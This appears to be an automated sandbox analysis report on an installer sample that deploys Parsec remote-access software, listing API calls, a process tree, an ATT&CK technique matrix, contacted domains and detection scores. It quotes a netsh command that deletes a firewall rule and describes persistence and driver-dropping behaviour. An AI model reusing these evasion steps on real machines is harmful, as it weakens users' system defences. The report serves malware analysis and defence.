Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: GetLocaleInfoW,51_2_00007FF7E5ADCAE0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,51_2_00007FF7E5ADCA30
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,51_2_00007FF7E5ADCC14
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: GetLocaleInfoW,51_2_00007FF7E5AD4B3C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,71_2_00007FF61819CA30
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: GetLocaleInfoW,71_2_00007FF61819CAE0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: GetLocaleInfoW,71_2_00007FF618194B3C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,71_2_00007FF61819CC14
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,71_2_00007FF61819C1CC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: EnumSystemLocalesW,71_2_00007FF61819C528
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: EnumSystemLocalesW,71_2_00007FF61819C5F8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,71_2_00007FF61819C690
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: EnumSystemLocalesW,71_2_00007FF6181946BC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: GetLocaleInfoW,71_2_00007FF61819C8D8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C2F4DD0 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiBuildDriverInfoList,SetupDiEnumDriverInfoW,SetupDiEnumDeviceInfo,GetLastError,SetupDiDestroyDeviceInfoList,SetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,48_2_00007FF72C2F4DD0
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\drvinst.exeQueries volume information: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\parsecvusba.cat VolumeInformation
Source: C:\Windows\System32\drvinst.exeQueries volume information: C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\parsecvirtualds.cat VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\runonce.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD032130 SHGetKnownFolderPath,CoTaskMemFree,RegisterServiceCtrlHandlerExW,SetServiceStatus,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,GetLastError,SetServiceStatus,SetServiceStatus,ConnectNamedPipe,GetLastError,GetNamedPipeClientProcessId,ProcessIdToSessionId,WTSGetActiveConsoleSessionId,OpenProcess,QueryFullProcessImageNameW,CloseHandle,OpenProcess,OpenProcessToken,SHGetKnownFolderPath,CoTaskMemFree,CloseHandle,CloseHandle,ReadFile,WriteFile,DisconnectNamedPipe,EnterCriticalSection,GetExitCodeProcess,CloseHandle,LeaveCriticalSection,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,SendSAS,RegCloseKey,OpenProcess,WriteFile,DisconnectNamedPipe,CloseHandle,CloseHandle,SetServiceStatus,39_2_00007FF7CD032130
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FB87AC free,free,free,free,free,free,free,_CxxThrowException,_CxxThrowException,free,free,free,free,free,free,free,free,free,free,memmove,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,GetSystemTimeAsFileTime,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,memmove,free,free,wcscmp,free,free,_CxxThrowException,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,memset,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,GetLastError,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,GetProcAddress,free,free,memset,memset,memset,free,free,free,free,free,free,free,free,GetProcAddress,GetLastError,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,memset,memset,memset,free,free,free,free,free,free,free,free,free,free,free,CompareFileTime,CompareFileTime,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,free,6_2_00FB87AC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3435E4 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,48_2_00007FF72C3435E4
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FCDEA0 GetVersion,GetModuleHandleW,GetProcAddress,6_2_00FCDEA0
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
MITRE ATT&CK matrix (one line per tactic; the number in parentheses is the report's signature hit count for that technique, cells without a number are the matrix's default technique names with no hits):
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information
Resource Development: Scripting (12); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server
Initial Access: Valid Accounts (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
Execution: Windows Management Instrumentation (1); Native API (1); Command and Scripting Interpreter (12); Scheduled Task/Job (1); Service Execution (13); Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
Persistence: Scripting (12); LSASS Driver (1); DLL Side-Loading (1); Valid Accounts (1); Windows Service (35); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (111); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Privilege Escalation: LSASS Driver (1); DLL Side-Loading (1); Valid Accounts (1); Access Token Manipulation (11); Windows Service (35); Process Injection (12); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (111); At; Cron; Launchd; Scheduled Task
Defense Evasion: Disable or Modify Tools (21); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (1); Timestomp (1); DLL Side-Loading (1); File Deletion (1); Masquerading (133); Valid Accounts (1); Virtualization/Sandbox Evasion (1); Access Token Manipulation (11); Process Injection (12)
Credential Access: Input Capture (11); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
Discovery: System Time Discovery (12); File and Directory Discovery (3); System Information Discovery (47); Query Registry (2); Security Software Discovery (21); Virtualization/Sandbox Evasion (1); Process Discovery (2); System Owner/User Discovery (2); System Network Configuration Discovery (1); Network Service Discovery; System Network Connections Discovery; Process Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content
Collection: Archive Collected Data (1); Input Capture (11); Clipboard Data (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (21); Non-Application Layer Protocol (3); Application Layer Protocol (14); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking
Behavior Graph ID: 1555525 Sample: uu8v4UUzTU.exe Startdate: 14/11/2024 Architecture: WINDOWS Score: 42
Contacted domains/IPs: beautifullyuncluttered.com; ifconfig.me; 2 other IPs or domains
Top-level signatures: Suricata IDS alerts for network traffic; Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Process tree (graph node ids in parentheses; "dropped" lists files written by that process; a signature is listed under the process that triggered it):
- uu8v4UUzTU.exe (15)
  - dropped: C:\Users\user\AppData\...\uu8v4UUzTU.tmp (PE32)
  - uu8v4UUzTU.tmp (23)
    - network: beautifullyuncluttered.com 188.114.96.3:443 (CLOUDFLARENETUS, European Union); ifconfig.me 34.160.111.145:443 (ATGS-MMD-ASUS, United States)
    - dropped: C:\Users\user\AppData\...\xwreg.dll (copy) (PE32); C:\Users\user\...\xpsservices.dll (copy) (PE32); C:\Users\user\AppData\...\wups.dll (copy) (PE32); 94 other files (none is malicious)
    - cmd.exe (36)
      - parsec-windows.exe (44)
        - dropped: C:\Program Files\Parsec\vusb\parsec-vud.exe (PE32); C:\Program Files\Parsec\pservice.exe (PE32+); C:\Users\user\AppData\Local\...\nsExec.dll (PE32); 8 other files (none is malicious)
        - cmd.exe (57)
          - parsec-vud.exe (66)
            - signature: Sample is not signed and drops a device driver
            - dropped: C:\Program Files\...\parsecvusba.sys (PE32+); C:\Program Files\...\parsecvirtualds.sys (PE32+); C:\Program Files\...\nefconw.exe (PE32+); 5 other files (none is malicious)
            - cmd.exe (86)
              - nefconw.exe (104)
                - signature: Creates an autostart registry key pointing to binary in C:\Windows
                - dropped: C:\Users\user\...\parsecvirtualds.sys (copy) (PE32+); C:\Users\user\AppData\Local\...\SET7030.tmp (PE32+)
                - runonce.exe (124)
                  - grpconv.exe (126)
              - nefconw.exe (108)
                - dropped: C:\Users\user\...\parsecvusba.sys (copy) (PE32+); C:\Users\user\AppData\Local\...\SET614C.tmp (PE32+)
              - conhost.exe (110)
              - nefconw.exe (112)
            - cmd.exe (88)
              - conhost.exe (114)
              - nefconc.exe (116)
          - conhost.exe (70)
        - wscript.exe (59)
          - signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Uses netsh to modify the Windows network and firewall settings; Windows Scripting host queries suspicious COM object (likely to drop second stage); Modifies the windows firewall
          - taskkill.exe (72)
            - conhost.exe (90)
          - sc.exe (74)
            - conhost.exe (92)
        - cmd.exe (62)
          - parsec-vdd.exe (76)
            - dropped: C:\Users\user\AppData\Local\...\nsExec.dll (PE32); C:\Users\user\AppData\Local\...\System.dll (PE32); C:\Program Files\...\uninstall.exe (PE32); 2 other files (none is malicious)
            - cmd.exe (94)
              - nefconw.exe (118)
                - dropped: C:\Users\user\AppData\Local\...\mm.dll (copy) (PE32+); C:\Users\user\AppData\Local\...\SET8ABC.tmp (PE32+)
              - 3 other processes (120)
            - wevtutil.exe (96)
              - 2 other processes (122)
          - conhost.exe (78)
        - 5 other processes (64)
          - sc.exe (80)
            - conhost.exe (98)
          - sc.exe (82)
            - conhost.exe (100)
          - 7 other processes (84)
            - 7 other processes (102)
      - conhost.exe (47)
    - cmd.exe (38)
      - 7z.exe (49)
        - dropped: C:\Users\user\AppData\...\parsec-windows.exe (PE32)
      - conhost.exe (51)
    - cmd.exe (40)
      - conhost.exe (53)
    - cmd.exe (42)
      - conhost.exe (55)
- svchost.exe (18)
  - drvinst.exe (27)
    - signature: Tries to open files direct via NTFS file id
  - drvinst.exe (30)
    - dropped: C:\Windows\...\parsecvusba.sys (copy) (PE32+); C:\Windows\System32\...\SET638E.tmp (PE32+)
  - drvinst.exe (32)
    - dropped: C:\Windows\...\parsecvirtualds.sys (copy) (PE32+); C:\Windows\System32\...\SET70EC.tmp (PE32+)
  - 2 other processes (34)
- pservice.exe (20)
  - signature: Creates files in the system32 config directory

Source | Detection | Scanner | Label | Link
uu8v4UUzTU.exe | 3% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
C:\Program Files\Parsec Virtual Display Driver\driver\mm.dll | 0% | ReversingLabs | |
C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | 0% | ReversingLabs | |
C:\Program Files\Parsec Virtual Display Driver\uninstall.exe | 0% | ReversingLabs | |
C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | 0% | ReversingLabs | |
C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | 0% | ReversingLabs | |
C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys | 0% | ReversingLabs | |
C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys | 0% | ReversingLabs | |
C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exe | 0% | ReversingLabs | |
C:\Program Files\Parsec\parsecd.exe | 0% | ReversingLabs | |
C:\Program Files\Parsec\pservice.exe | 0% | ReversingLabs | |
C:\Program Files\Parsec\skel\parsecd-150-93b.dll | 0% | ReversingLabs | |
C:\Program Files\Parsec\teams.exe | 0% | ReversingLabs | |
C:\Program Files\Parsec\uninstall.exe | 0% | ReversingLabs | |
C:\Program Files\Parsec\vdd\parsec-vdd.exe | 0% | ReversingLabs | |
C:\Program Files\Parsec\vusb\parsec-vud.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-O9NMT.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsg84FF.tmp\System.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsg84FF.tmp\nsExec.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsj258A.tmp\ApplicationID.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsj258A.tmp\System.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsj258A.tmp\nsDialogs.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsj258A.tmp\nsExec.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\System.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\UserInfo.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\nsExec.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\SET614C.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.sys (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\SET8ABC.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\mm.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\SET7030.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.sys (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\7z.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\7z.exe (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\IEAdvpack.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\KBDA3.DLL (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\LockAppBroker.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\MCRecvSrc.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\MFWMAAEC.DLL (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\MP43DECD.DLL (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\RdpSaUacHelper.exe (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\SyncInfrastructureps.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\SystemEventsBrokerClient.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\TpmTool.exe (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\TrustedSignalCredProv.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\UserDataAccessRes.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\VAN.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\VscMgrPS.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\WSClient.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\Windows.ApplicationModel.ConversationalAgent.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\Windows.UI.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\cryptdlg.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\dmcfgutils.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\dskquoui.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\getuname.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\gp548-win64-mingw.exe (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\icuin.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\iesysprep.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-0HD4S.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-2DG57.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-2OR81.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-2UJJU.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-3JPOJ.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-3KUTO.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-4URGO.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-514OT.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-66C2H.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-6QS3I.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-9HF18.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-9PV08.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-ADU4M.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-B9257.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-BT11A.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-CEP95.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-CFLCO.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-CR69T.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-DPGTR.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-E0QD0.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-E9NUA.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-ETRQM.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-G3B26.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-GF1GP.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-GTN75.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-HI204.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-I559Q.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-IH0UT.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-IQ3DU.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-JBM9N.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-JR54E.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-KU451.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-KU5LP.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\PSecWin\is-LQSSJ.tmp | 0% | ReversingLabs | |

No Antivirus matches

Source | Detection | Scanner | Label | Link
beautifullyuncluttered.com | 0% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
https://parsec.appURLUpdateInfohttps://parsec.app/changelogURL:parsec | 0% | Avira URL Cloud | safe |
https://parsec.appURLUpdateInfohttps://parsec.app/changelog | 0% | Avira URL Cloud | safe |
https://parsec.appURLUpdateInfohttps://parsec.app/changelogkernel32::Wow64EnableWow64FsRedirection(i | 0% | Avira URL Cloud | safe |
https://beautifullyuncluttered.com/ | 0% | Avira URL Cloud | safe |
https://support.parsec.appInstallLocationNoModifyNoRepairPublisherParsec | 0% | Avira URL Cloud | safe |
https://beautifullyuncluttered.com/?CheckApp | 0% | Avira URL Cloud | safe |
https://beautifullyuncluttered.com/ | 0% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
beautifullyuncluttered.com | 188.114.96.3 | true | true | | unknown
ifconfig.me | 34.160.111.145 | true | false | | high
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://ifconfig.me/ip | false | | high
https://beautifullyuncluttered.com/?CheckApp | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | uu8v4UUzTU.exe, is-LQSSJ.tmp.2.dr | false | | high
https://parsec.appURLUpdateInfohttps://parsec.app/changelogURL:parsec | parsec-windows.exe, 0000000D.00000003.2494039079.0000000000675000.00000004.00000020.00020000.00000000.sdmp, parsec-windows.exe, 0000000D.00000002.2494938332.0000000000675000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.remobjects.com/ps | uu8v4UUzTU.exe, 00000000.00000003.2029697537.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.exe, 00000000.00000003.2029324917.0000000002510000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000000.2031188431.0000000000401000.00000020.00000001.01000000.00000004.sdmp | false | | high
https://ifconfig.me/ | uu8v4UUzTU.tmp, 00000002.00000002.2293720265.0000000003710000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ifconfig.me/ip5.1ry | uu8v4UUzTU.tmp, 00000002.00000003.2288804175.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000002.2292586991.0000000000A9D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.unicode.org/copyright.html | uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://www.innosetup.com/ | uu8v4UUzTU.exe, 00000000.00000003.2029697537.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.exe, 00000000.00000003.2029324917.0000000002510000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000000.2031188431.0000000000401000.00000020.00000001.01000000.00000004.sdmp | false | | high
https://parsec.appURLUpdateInfohttps://parsec.app/changelog | parsec-vdd.exe, 00000041.00000002.2492098487.00000000005D1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | parsec-windows.exe, 0000000D.00000000.2203144262.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040A000.00000004.00000001.01000000.00000011.sdmp, parsec-vud.exe, 0000002D.00000000.2346150656.000000000040A000.00000008.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000000.2456937852.000000000040A000.00000008.00000001.01000000.00000017.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmp | false | | high
https://parsec.appURLUpdateInfohttps://parsec.app/changelogkernel32::Wow64EnableWow64FsRedirection(i | parsec-vud.exe, 0000002D.00000002.2450362899.0000000000518000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://beautifullyuncluttered.com/ | uu8v4UUzTU.tmp, 00000002.00000002.2293815599.000000000374D000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000003.2286699133.0000000003720000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://support.parsec.appInstallLocationNoModifyNoRepairPublisherParsec | parsec-windows.exe, 0000000D.00000003.2494039079.0000000000675000.00000004.00000020.00020000.00000000.sdmp, parsec-windows.exe, 0000000D.00000002.2494938332.0000000000675000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2450362899.0000000000518000.00000004.00000020.00020000.00000000.sdmp, parsec-vdd.exe, 00000041.00000002.2492098487.00000000005D1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
